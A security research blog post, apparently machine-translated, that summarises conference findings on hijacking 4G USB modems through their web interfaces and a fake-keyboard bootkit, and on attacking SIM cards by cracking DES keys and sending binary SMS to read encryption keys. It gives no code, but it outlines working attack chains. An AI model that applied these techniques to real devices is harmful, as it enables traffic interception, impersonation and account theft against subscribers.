4G Security: Capturing a USB Modem and SIM Card via SMS

Telecom operators actively promote fast and cheap 4G communications. But as far as it is protected, few know. The experts of Positive Technologies in the process of researching the security of 4G communications managed to find vulnerabilities in USB modems that allow taking control of the computer to which the modem is connected, as well as the subscriber account on the mobile operator’s portal. In addition, attacks on the SIM card using binary SMS allow you to intercept and decrypt subscriber traffic, or simply block a given SIM card.

Reports on the results of the study were presented in November at the ZeroNights conference in Moscow (Kirill Nesterov, Alexey Osipov, Timur Yunusov) and the PacSec conference in Tokyo (Sergey Gordeychik, Alexander Zaitsev). In this publication, we summarize the main ideas of the research, in which Dmitry Sklyarov, Gleb Gritsai, Dmitry Kurbatov, Sergey Puzankov and Pavel Novikov also participated.
')
A few words about the purpose of this work. The case concerns not only the security of fashionable smartphones, with the help of which we read our friends on social networks. GSM digital mobile communications are now used in many critical infrastructures, including industrial control systems (SCADA). Another example from everyday life that no one would like to meet is the theft of money from bank accounts. Meanwhile, many probably saw such small antennas at ATMs - here, too, GSM:



A modern wireless modem is a computer that has a known operating system installed (usually Linux or Android) and a number of special applications with sufficiently wide capabilities. In this software and data transfer protocols, there are vulnerabilities that have already been exploited in recent years — for example, to unlock a modem and untie it from the operator. One of the means of protection against such hacks was the transfer of many services to the Web - but this only gave new opportunities for attacks.

For our study, we took six different lines of USB modems with 30 different firmware. Looking ahead - it was not possible to crack only three firmware.

What did you do with the rest? To begin with, we identify the “piece of iron”. This helps us documentation and search engines. In some cases, Google helps even more - you can immediately find a password for telnet access:



However, for external communications, we do not need telnet, but http. We connect the modem to the computer and study it as a separate network node with web applications. We find the possibility of attack through the browser (CSRF, XSS, RCE). In this way we force the modem to tell about itself various useful data:





In addition to the disclosure of data on the attacked modem, you can:

• Change DNS settings (which allows you to intercept traffic);
• Change SMS center settings (intercepting SMS or manipulating them);
• Change the password on the self-service portal via SMS (which allows you to withdraw money from your account by subscribing to a third-party service);
• Block the modem by dialing wrong PIN and PUK codes;
• Remotely "update" the modem firmware.

You can develop an attack and continue to get to the computer to which the USB modem is connected. One of the variants of such an attack: a USB keyboard driver is installed on the captured modem, after which the computer perceives the modem as an input device. From this “imaginary keyboard”, a reboot command from an external drive is transmitted to the computer, the role of which is played by the same modem. Thus, a bootkit can be installed on the “parent” computer, which allows you to remotely control the computer. How it works, you can see in the video:



The best thing that a user can do to protect against such attacks is not to thrust anything into their USB ports. Realizing at the same time, the phrase “horrible” includes even USB modems, which from the outside seem to be just a small and harmless communication device.

The second part of our research concerned SIM-cards. The fact that Simka itself is also a computer with its own OS, file system, and multifunctional applications has already been demonstrated by many other researchers. So, in May of this year, at the Positive Hack Days conference, encryption specialist Karsten Noel showed that Simok applications (TARS) are protected differently. Some can be hacked by selecting DES-keys, and some respond to external commands without any protection at all - and they tell a lot about themselves.

For the selection of keys in our study, we used a set of user-programmable valve arrays (FPGA), which came into fashion a couple of years ago for mining Bitcoin digital currency, and after the fall in popularity of this entertainment, they became much cheaper. Our board of eight modules * ZTEX 1.15y for 2 thousand euros counts at a speed of 245.760 Mcrypt / sec, which allows you to pick up the DES key for 3 days.





After that we can send commands to known TARs and manage them. In particular, the card manager of the Card manager allows us to load our java application onto the SIM card.

Another interesting TAR is the File system file system where TMSI (phone identifier in the mobile network) and Kc (traffic encryption key) are stored. Access to them allows us using binary SMS:

• Decrypt subscriber traffic without selecting keys;
• Substitute the subscriber (receive his calls and SMS);
• Follow the movement of the subscriber;
• If you have a PIN code that protects the file system, you can block the subscriber (three incorrect PIN codes and 10 incorrect PUK codes, after which the card is blocked).

In conclusion, simple statistics. In this study, more than one hundred SIM cards of various operators were used. The described vulnerabilities are subject to 20% of them, that is, every fifth "SIM".

At the same time, it is hardly possible to give any protection tips for end users: the attacks occur at a rather low technical level, so SIM card manufacturers and operators must solve the security issues here. Western IT-press, by the way, already describes this research in the news as “the possibility of hacking millions of SIM-cards and USB-modems ”.

PS This was not the only study by Positive Technologies experts presented at ZeroNights'14. At the same conference, Artyom Shishkin and Mark Yermolov talked about the mechanisms for circumventing the Windows PatchGuard protection system in Windows 8: some details of the study can be found here , details will be presented in one of our next posts.